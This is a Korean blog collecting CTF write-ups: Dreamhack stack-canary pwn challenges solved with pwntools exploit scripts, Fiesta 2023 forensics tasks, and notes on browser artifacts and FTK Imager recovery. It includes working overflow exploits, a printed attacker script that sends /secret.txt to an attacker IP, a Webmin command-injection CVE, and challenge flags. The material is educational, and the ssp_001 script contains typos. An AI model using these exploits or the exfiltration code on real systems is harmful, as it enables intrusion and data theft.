have a Young's

[Dreamhack.io] ssp_001

youung — Sun, 7 Apr 2024 21:33:08 +0900

문제 설명

문제 파일

ELF 파일과 C파일이 주어진다.

checksec --file=ssp_001

Canary와 NX 보호기법이 걸려있는 것을 확인할 수 있다.

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
void get_shell() {
    system("/bin/sh");
}
void print_box(unsigned char *box, int idx) {
    printf("Element of index %d is : %02x\n", idx, box[idx]);
}
void menu() {
    puts("[F]ill the box");
    puts("[P]rint the box");
    puts("[E]xit");
    printf("> ");
}
int main(int argc, char *argv[]) {
    unsigned char box[0x40] = {};
    char name[0x40] = {};
    char select[2] = {};
    int idx = 0, name_len = 0;
    initialize();
    while(1) {
        menu();
        read(0, select, 2);
        switch( select[0] ) {
            case 'F':
                printf("box input : ");
                read(0, box, sizeof(box));
                break;
            case 'P':
                printf("Element index : ");
                scanf("%d", &idx);
                print_box(box, idx);
                break;
            case 'E':
                printf("Name Size : ");
                scanf("%d", &name_len);
                printf("Name : ");
                read(0, name, name_len);
                return 0;
            default:
                break;
        }
    }
}

get_shell 함수를 호출하면 쉘을 딸 수 있다.

F, P, E로 스위치 문을 실행한다.

F 입력 시 : box(0x40) 사이즈 만큼 입력할 수 있다.

P 입력 시 : idx를 입력받고, print_box 함수를 호출한다.

E 입력 시 : name_len을 입력받고, 입력 받은 name_len 만큼 name을 입력받을 수 있다.

여기서 name은 0x40으로 할당되어 있는데

사용자가 지정한 name_len 만큼 입력받을 수 있으므로 BOF 발생!!

ret 값을 get_shell() 주소로 바꾸면 될 것 같다.

   0x0804872b <+0>:     push   %ebp
   0x0804872c <+1>:     mov    %esp,%ebp
   0x0804872e <+3>:     push   %edi
   0x0804872f <+4>:     sub    $0x94,%esp
   0x08048735 <+10>:    mov    0xc(%ebp),%eax
   0x08048738 <+13>:    mov    %eax,-0x98(%ebp)
   0x0804873e <+19>:    mov    %gs:0x14,%eax
   0x08048744 <+25>:    mov    %eax,-0x8(%ebp)
   0x08048747 <+28>:    xor    %eax,%eax
   0x08048749 <+30>:    lea    -0x88(%ebp),%edx
   0x0804874f <+36>:    mov    $0x0,%eax
   0x08048754 <+41>:    mov    $0x10,%ecx
   0x08048759 <+46>:    mov    %edx,%edi
   0x0804875b <+48>:    rep stos %eax,%es:(%edi)
   0x0804875d <+50>:    lea    -0x48(%ebp),%edx
   0x08048760 <+53>:    mov    $0x0,%eax
   0x08048765 <+58>:    mov    $0x10,%ecx
   0x0804876a <+63>:    mov    %edx,%edi
   0x0804876c <+65>:    rep stos %eax,%es:(%edi)
   0x0804876e <+67>:    movw   $0x0,-0x8a(%ebp)
   0x08048777 <+76>:    movl   $0x0,-0x94(%ebp)
   0x08048781 <+86>:    movl   $0x0,-0x90(%ebp)
   0x0804878b <+96>:    call   0x8048672 <initialize>
   0x08048790 <+101>:   call   0x80486f1 <menu>
   0x08048795 <+106>:   push   $0x2
   0x08048797 <+108>:   lea    -0x8a(%ebp),%eax
   0x0804879d <+114>:   push   %eax
   0x0804879e <+115>:   push   $0x0
   0x080487a0 <+117>:   call   0x80484a0 <read@plt>
   0x080487a5 <+122>:   add    $0xc,%esp
   0x080487a8 <+125>:   movzbl -0x8a(%ebp),%eax
   0x080487af <+132>:   movsbl %al,%eax
   0x080487b2 <+135>:   cmp    $0x46,%eax
   0x080487b5 <+138>:   je     0x80487c6 <main+155>
--Type <RET> for more, q to quit, c to continue without paging--
   0x080487b7 <+140>:   cmp    $0x50,%eax
   0x080487ba <+143>:   je     0x80487eb <main+192>
   0x080487bc <+145>:   cmp    $0x45,%eax
   0x080487bf <+148>:   je     0x8048824 <main+249>
   0x080487c1 <+150>:   jmp    0x804887a <main+335>
   0x080487c6 <+155>:   push   $0x804896c
   0x080487cb <+160>:   call   0x80484b0 <printf@plt>
   0x080487d0 <+165>:   add    $0x4,%esp
   0x080487d3 <+168>:   push   $0x40
   0x080487d5 <+170>:   lea    -0x88(%ebp),%eax
   0x080487db <+176>:   push   %eax
   0x080487dc <+177>:   push   $0x0
   0x080487de <+179>:   call   0x80484a0 <read@plt>
   0x080487e3 <+184>:   add    $0xc,%esp
   0x080487e6 <+187>:   jmp    0x804887a <main+335>
   0x080487eb <+192>:   push   $0x8048979
   0x080487f0 <+197>:   call   0x80484b0 <printf@plt>
   0x080487f5 <+202>:   add    $0x4,%esp
   0x080487f8 <+205>:   lea    -0x94(%ebp),%eax
   0x080487fe <+211>:   push   %eax
   0x080487ff <+212>:   push   $0x804898a
   0x08048804 <+217>:   call   0x8048540 <__isoc99_scanf@plt>
   0x08048809 <+222>:   add    $0x8,%esp
   0x0804880c <+225>:   mov    -0x94(%ebp),%eax
   0x08048812 <+231>:   push   %eax
   0x08048813 <+232>:   lea    -0x88(%ebp),%eax
   0x08048819 <+238>:   push   %eax
   0x0804881a <+239>:   call   0x80486cc <print_box>
   0x0804881f <+244>:   add    $0x8,%esp
   0x08048822 <+247>:   jmp    0x804887a <main+335>
   0x08048824 <+249>:   push   $0x804898d
   0x08048829 <+254>:   call   0x80484b0 <printf@plt>
   0x0804882e <+259>:   add    $0x4,%esp
   0x08048831 <+262>:   lea    -0x90(%ebp),%eax
   0x08048837 <+268>:   push   %eax
--Type <RET> for more, q to quit, c to continue without paging--
   0x08048838 <+269>:   push   $0x804898a
   0x0804883d <+274>:   call   0x8048540 <__isoc99_scanf@plt>
   0x08048842 <+279>:   add    $0x8,%esp
   0x08048845 <+282>:   push   $0x804899a
   0x0804884a <+287>:   call   0x80484b0 <printf@plt>
   0x0804884f <+292>:   add    $0x4,%esp
   0x08048852 <+295>:   mov    -0x90(%ebp),%eax
   0x08048858 <+301>:   push   %eax
   0x08048859 <+302>:   lea    -0x48(%ebp),%eax
   0x0804885c <+305>:   push   %eax
   0x0804885d <+306>:   push   $0x0
   0x0804885f <+308>:   call   0x80484a0 <read@plt>
   0x08048864 <+313>:   add    $0xc,%esp
   0x08048867 <+316>:   mov    $0x0,%eax
   0x0804886c <+321>:   mov    -0x8(%ebp),%edx
   0x0804886f <+324>:   xor    %gs:0x14,%edx
   0x08048876 <+331>:   je     0x8048884 <main+345>
   0x08048878 <+333>:   jmp    0x804887f <main+340>
   0x0804887a <+335>:   jmp    0x8048790 <main+101>
   0x0804887f <+340>:   call   0x80484e0 <__stack_chk_fail@plt>
   0x08048884 <+345>:   mov    -0x4(%ebp),%edi
   0x08048887 <+348>:   leave
   0x08048888 <+349>:   ret

gdb로 어셈블리 코드를 확인해 보자!

select : ebp-0x8a

box : ebp-0x88

idx : ebp-0x94

name_len : ebp-0x90

name : ebp-0x48

에 저장되는 것을 확인할 수 있다.

<main+4> sub $0x94,%esp

를 보면 스택을 0x94만큼 확장하는데 변수의 크기가 총 0x90이다.

따라서 0x4만큼의 dummy가 있는 것이다.

<main+19>: mov %gs:0x14,%eax

<main+25>: mov %eax,-0x8(%ebp)

gs:0x14에서 canary 값을 가져와서 eax에 저장하고

%ebp-0x8에 저장하는 것을 확인할 수 있다.

(따라서 canary는 ebp-0x8에 있음)

스택은 다음과 같다.

ebp-0x94	idx[4]
ebp-0x90	name_len[4]
ebp-0x8a	select[2]
ebp-0x88	box[40]
ebp-0x48	name[40]
ebp-0x08	canary[4]
ebp-0x04	edi(dummy)
ebp	sfp[4] (이전 ebp)
	ret[4]

canary는 버퍼가 모두 할당된 후에 버퍼랑 sfp(이전 스택 프레임 ebp) 사이에 존재하니,

name 다음에 위치한다.

from pwn import*

p = remote('host.dreamhack.games', 9590)
e = EFL('./ssp_001')

get_shell = e.symbols['get_shell']
canary =b""

#canary leak
for i in range(131, 127, -1):
	p.sendafter('>', 'p')
    p.sendlineafter('Element index : '. str(i))
    p.recvuntil(' : ')
    canary += p.recv(2)
    
canary = int(canary, 16)

#BOF
payload = b'A' * 64
payload += p32(canary)
payload += b'A' * 8
payload += p32(get_shell)

p.sendlineafter('> ', 'E')
p.sendlineafter('Name Size : ', str(1000))
p.sendlineafter('Name : ', payload)

p.interactive()

exploit 코드를 실행해보자

성공적으로 flag를 구했다!

flag

DH{00c609773822372daf2b7ef9adbdb824}

[Dreamhack.io] ssp_000

youung — Wed, 3 Apr 2024 17:40:36 +0900

문제 설명

문제 파일

ELF 파일과 C파일이 주어진다.

checksec --file=ssp_000

checksec 명령어로 보호기법을 확인하면, canary가 걸려있는 것을 확인할 수 있다.

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

void get_shell() {
    system("/bin/sh");
}

int main(int argc, char *argv[]) {
    long addr;
    long value;
    char buf[0x40] = {};

    initialize();


    read(0, buf, 0x80);

    printf("Addr : ");
    scanf("%ld", &addr);
    printf("Value : ");
    scanf("%ld", &value);

    *(long *)addr = value;

    return 0;
}

ssp_000.c 코드를 확인해 보자.

get_shell 함수로 쉘을 실행할 수 있다.

buf는 0x40만큼 할당되었는데 read 부분을 보면, 0x80 만큼 사용자로부터 입력을 받고 있다.

이 부분에서 BOF 취약점이 발생한다.

그 다음에 scanf로 addr, value 값을 입력받고, addr이 가리키는 주소에 value의 값을 넣는다.

gdb로 어셈블리 코드를 확인해 보자!

buf : %rbp-0x50
addr : %rbp-0x60
value : %rbp-0x58

에 저장되는 것을 확인할 수 있다.

__stack_chk_fail가 호출될 때,

get_shell 함수의 주소를 넣어준다면 flag를 구할 수 있을 것이다!

from pwn import *

r = remote("host1.dreamhack.games", 22317)
e = ELF("./ssp_000")

r.send("a"*0x80)
r.sendlineafter("Addr : ", str(e.got["__stack_chk_fail"]))
r.sendlineafter("Value : ", str(e.symbols["get_shell"]))

r.interactive()

addr에 __stack_chk_fail의 got 주소를 넣고, value 값에 get_shell 함수 주소를 넣어주었다.

성공적으로 flag를 구했다!

flag

DH{e4d253b82911565ad8dd9625fb491ab0}

윈도우11 노트북에서 NOX(녹스) VT 활성화 방법

youung — Sun, 17 Mar 2024 14:51:54 +0900

작업 관리자에서 CPU 확인했을 때
가상화가 사용으로 되어있음에도
NOX를 실행하면 VT가 활성화되어 있지 않다고 뜬다.

구글링을 해보니 바이오스에서 설정을 해야 한다고 했는데
아무리 바이오스(삼성 노트북)를 뒤져도 가상환경 설정을 찾지 못했다 ㅠㅠ
그래서 나는 다른 방법으로 간단하게 해결했다.

먼저 시작에서 Windows 기능 켜기/끄기를 실행한다.

나는 원래 가상 머신 플랫폼이 체크되어 있었다.
체크를 해제하고 확인을 누르면 재부팅을 하라고 하는데,
재부팅을 하고 나면 NOX가 정상적으로 실행된다!

[Fiesta 2023] 특별문제 2

youung — Tue, 13 Feb 2024 23:54:29 +0900

문제 정보

문제에는 pcapng 파일이 주어진다.

172.112.93.7 가 192.168.98.130 으로 계속해서 Ping을 보내는 것을 확인할 수 있다.

따라서 의심가는 IP는 172.112.93.7 이다.

FLAG

fiesta{172.112.93.7}

문제 정보

문제 2 - 1에서 이어지는 문제다.

의심되는 IP (172.112.93.7)을 검색했을 때

이 IP가 사용한 프로토콜은 ICMP임을 확인할 수 있다.

FLAG

fiesta{ICMP}

문제 정보

문제 2-1과 2-2에 이어지는 문제다.

의심되는 IP가 전송한 패킷 데이터를 보면 "."과 "-"로 이루어진 데이터를 볼 수 있다.

0x2e = .

0x2d = -

tshark -r data.pcapng -Y "ip.addr == 172.112.93.7 && icmp.type == 8" -T fields -e data

IP 주소가 172.112.93.7이고 ICMP 유형이면

각 패킷의 데이터를 필드로 지정하고 필드만 출력하는 명령어를 사용했다.

From Hex

From Morse Code

Cyberchef를 사용해 Hex를 모스코드로 변환하고, 모스코드를 해석하면

FLAG를 구할 수 있다!

FLAG

fiesta{5C34BA5F5E2980C11BC9532EB91AB6D6FEF8C8D0}

[Fiesta 2023] 침해대응 3

youung — Tue, 13 Feb 2024 19:59:33 +0900

문제 정보

문제에는 pcapng 파일이 1개 주어진다.

editcap -F libpcap -T ether capture.pcapng capture.pcap

NetworkMiner로 열기 위해 pcapng파일을 pcap 파일로 변환시켰다.

공격자와 서버의 IP 주소를 알아냈다.

공격자 : 192.168.152.130

서 버 : 192.168.152.129

ip.src == 192.168.152.130 and ip.dst == 192.168.152.129

공격자와 서버의 ip를 필터링을 걸어 패킷을 확인했다.

POST  /password_change.cgi  HTTP/1.1

공격에 성공한 패킷을 확인했을 때 /password_chage.cgi 에서

bas64로 인코딩된 문자열을 발견했다.

해당 공격을 구글링해서 webmin 원격코드 실행 취약점이라는 것을 알아냈다.

https://www.cvedetails.com/cve/CVE-2019-15107/

CVE-2019-15107 : An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injectio

CVE-2019-15107 : An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

www.cvedetails.com

8080 Port로 데이터가 전송된 패킷을 확인했다.

/tmp/ak1n234

/tmp/ak1n234 파일을 확인할 수 있다.

xor 10

n,e = (20484848979077986247262160404274050441451911882502922748131956702633362849273718249306927824530459256080477468268877666964112964
import binascii
try:
	f = open("/secret.txt",'rb')
	data = int(binascii.hexlify(f.read()),16)
	encdata = str(hex(pow(data, e, n))).encode()
	import socket
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	sock.sendto(encdata, ('192.168.152.130', 51421))
	sock.close()
except:
	pass

해당 데이터를 xor 해서 Python 코드를 구했다.

위 코드는 secret.txt 를 RSA로 암호화해서 192.168.152.130:51421 로 전송한다.

ip.dst == 192.168.152.130

Destionation IP가 공격자인 패킷들만 검색해 전송된 데이터를 확인했다.

from Crypto.Util.number import long_to_bytes
from gmpy2 import iroot

n = 20484848979077986247262160404274050441451911882502922748131956702633362849273718234324115969494857760951327174628643060473805741303200210421875714914781586471154632824325230316477327865331727378702302145153523082596876051740521413585082431019783403238543826742154162368028557809481592985346537427096904366274104098894412037891460999045407239762218306023340045379247500852588035554011290036567053879452998972455830942886731392302771340227553171170254739251791179350385938286349047213032701214775980758527295226157212440697739528536471048566153

c = 0xd3e5a3da7412766fcef80819e5215db5bf6a742f9d7dfb4d7b841c6322b0c0b3f99e7cc79d98b8a8bfd085afa8935ec7d5af716a16b5b50b9f5f9e8a5d36bf3688f325d660b3fc418f46bede1cc48b0166869787a5262ed693427beea32158ea7f89ddfadd76c7fe8

flag = long_to_bytes(iroot(c, 3)[0])
print(flag)

복호화로 FLAG의 뒷 부분을 구했다!

FLAG

fiesta{CVE-2019-15107_ce343a02efb635cdf61948a9dd101259}

[Fiesta 2023] 시나리오 - APT 1

youung — Thu, 1 Feb 2024 17:36:51 +0900

문제 정보

주어진 파일을 압축해제를 하면 eml 파일들이 있다.

MiTeC Mail Viewer로 주어진 폴더를 열어보았다.

메일을 각각 확인해 보면, 첨부파일로 zip 파일이 존재했다.

Check All 후에 Messages -> Save -> Attachments only

메일에 첨부되어 있는 파일을 모두 추출했다.

unzip '*.zip'

unzip 명령어를 통해 zip 파일들을 모두 압축해제 했다.

추출된 파일들을 확인해 보니 .docx와 .exe 파일이 있었다.

find -type f -name "*.exe"

한눈에 봐도 .docx 형식의 파일이 많았다.

그래서 .exe 파일만 따로 검색해 보았더니 총 6개가 존재했다.

아마도 이 중에서 악성코드가 있을 것 같다.

6개의 파일 중에 becauseq1af2332.exe 파일만 권한이 필요하다.

이 파일이 악성파일인 것 같다.

CerUtil -hashfile becauseq1af2332.exe SHA256

해당 파일의 SHA256를 구했다.

FLAG

fiesta{bcb10a8e6250ecb142932ba59cbe94e47f2e143564df1886a5838317bc275b40}

[Fiesta 2023] 랜섬웨어 1

youung — Thu, 1 Feb 2024 15:13:28 +0900

문제 정보

주어진 가상머신을 VMware에서 실행했다.

Documents 폴더

Documents 폴더를 보면 파일들이 랜섬웨어에 의해 암호화된 것을 볼 수 있었다.

Downloads 폴더

해당 가상머신에서 다운로드 폴더를 확인해 보면, 총 5개의 프로그램을 확인할 수 있다.

portry라는 앱이 총 3개(바탕화면 1개, 다운로드 폴더에 2개)가 있는데

그 중 1개가 랜섬웨어로 추정된다.

CerUtil -hashfile portry.exe SHA256

랜섬웨어의 해시를 구했다.

FLAG

fiesta{ad1553caa9f56cb7a43927f9d494eacb7df3cdc6d1a01ee3fe3c8ba696e}

[Fiesta 2023] 시나리오 - 공급망 공격 1

youung — Thu, 1 Feb 2024 12:35:18 +0900

문제 정보

주어진 파일

exe 파일이 1개 주어진다.

주어진 파일을 exeinfo로 확인해 보면

Visual Basic으로 작성된 것을 확인할 수 있었다.

VB Decompiler pro

VB Decompiler pro로 프로그램을 디컴파일 해보았다.

Module2 -> Proc_4_0_405EF8에서 IP 주소와 PORT 번호를 확인할 수 있다.

IP : 40.82.159.132 / PORT : 3117

Module2 -> Proc_4_3_40513C

Module2 -> Proc_4_3_40513C을 보면 var_8C를 Xor 7 하는 것을 확인할 수 있다.

"rtbu" xor 7 = user

ID : user

Module2 -> Proc_4_4_404FDC

비밀번호도 마찬가지로 "dofidb65$#"에 xor 7을 하고 있다.

PW : chance12#$

FLAG

fiesta{40.82.159.132_1337_user_chance12#$}

방문한 웹 사이트 기록 분석하는 방법 (Web Artifact)

youung — Fri, 26 Jan 2024 14:23:23 +0900

웹 아티팩트 (Web Artifact)

: 사용자로 인해 웹 어플리케이션과 웹 브라우저가 통신하면서 생성되는 기록(흔적).

1) 웹 히스토리 (Web History)

- 웹 사이트 방문 시 웹 사이트 정보를 분류해 저장.

- URL, 접속 시간, 접속 횟수, 페이지 제목 등의 정보 제공.

2) 웹 캐시 (Cache)

- 웹 사이트 접속 시 방문사이트로부터 자동으로 전달받는 데이터.

- 기존에 방문했던 웹 사이트를 재방문 할 때 변경되지 않은 정보는 다시 다운받지 않고 웹 캐시에서 로딩하는 방식.

- 캐시파일 정보(저장 시간, 파일명, 타입, 크기, 경로), 이미지, 텍스트, HTML, XML, 스크립트 파일 등의

웹 페이지를 표현하기 위한 다양한 데이터들을 포함.

3) 웹 쿠키 (Cookie)

- HTTP 통신에서 접속상태 유지하도록 사용자 정보를 잠시 저장해두는 임시 저장소.

- 정보를 사용자 시스템에 저장하므로 웹 히스토리와 마찬가지로 방문한 페이지에 대한 정보를 제공하기도 함.

- 가볍고 빠른 웹 통신이 가능하지만 사용자가 꾸준히 접속을 유지해야 하므로 불리한 구조.

- 호스트 경로, 쿠키 수정 시간, 쿠키 만료 시간, 이름, 값 등의 정보 제공.

4) 웹 다운로드 목록 (Download File List)

- 웹 브라우저는 웹에서 다운로드 받은 파일의 안정적 전송과 이력을 관리하기 위해 다운로드 되는 파일의 목록 관리.

- 사용자가 웹 브라우저를 통해 직접 다운로드한 파일의 정보.

- 의도치 않게 다운로드 된 파일(ex : cache)과 구분됨.

- 파일이 저장된 경로, 다운로드 URL, 파일 크기, 시간, 정상 다운로드 여부 등의 정보 제공.

< Cookie vs Cache >

	Cookie	Cache
목적	유저 관련 정보	웹 페이지 로딩 속도 개선
저장 데이터	User Preference (유저가 웹 사이트 접속 시 하는 행동패턴 or 관련 정보)	오디오, 이미지, 비디오 등 리소스 파일
삭제 시기	Expiration Time 만료 시 자동 삭제	유저가 삭제
Web Server Access	가능	불가능

WebCacheV01.dat

: 기존의 index.dat 파일의 구성과 달리 ESE (Extensible Storage Engine) Database를 기반으로 구성하며,

history, cache, cookie, download 등 여러 항목에 대한 정보들을 1개의 파일로 통합 관리한다.

- Caching System을 바탕으로 높은 성능, 신뢰성, 안전성 제공.

- 1MB ~ 1TB 파일까지의 다양한 데이터 사이즈 지원.

* Internet Explorer 10부터는 WebCacheV*.dat 파일에 모든 기록을 저장함.

<파일 경로>

C:\Users\(user)\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

[ WebCacheV01.dat 수집 및 분석 방법 ]

- IE10Analyer 툴 사용.

https://moaistory.blogspot.com/2016/08/ie10analyzer.html

IE10Analyzer

IE10Analyzer This tool can parse normal records and recover deleted records in WebCacheV01.dat. WebCacheV01.dat is used in Inte...

moaistory.blogspot.com

1. FTK Imager로 C:\Users\(user)\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

파일을 Export Files 한다.

2. IE10Analyzer에 FTK Imager로 Export한 WebCacheV01.dat 파일을 연다.

Time Zones은 UTC+9로 설정한다.

FTK Imager로 삭제된 파일 복원하기

youung — Fri, 26 Jan 2024 14:02:41 +0900

1. FTK Imager를 열고, Add Evidence Item을 클릭 후 Logical Drive 선택 후 다음

Add to

2. Source Drive 선택하고 완료

3. 삭제된 파일 선택해서 Export Files를 한다.

결과를 보면 성공적으로 추출했다.

Export Results가 0 bytes인 경우에는 복원이 되지 않은 것이다.

추출한 파일을 열어보니 복원이 된 것을 확인할 수 있다.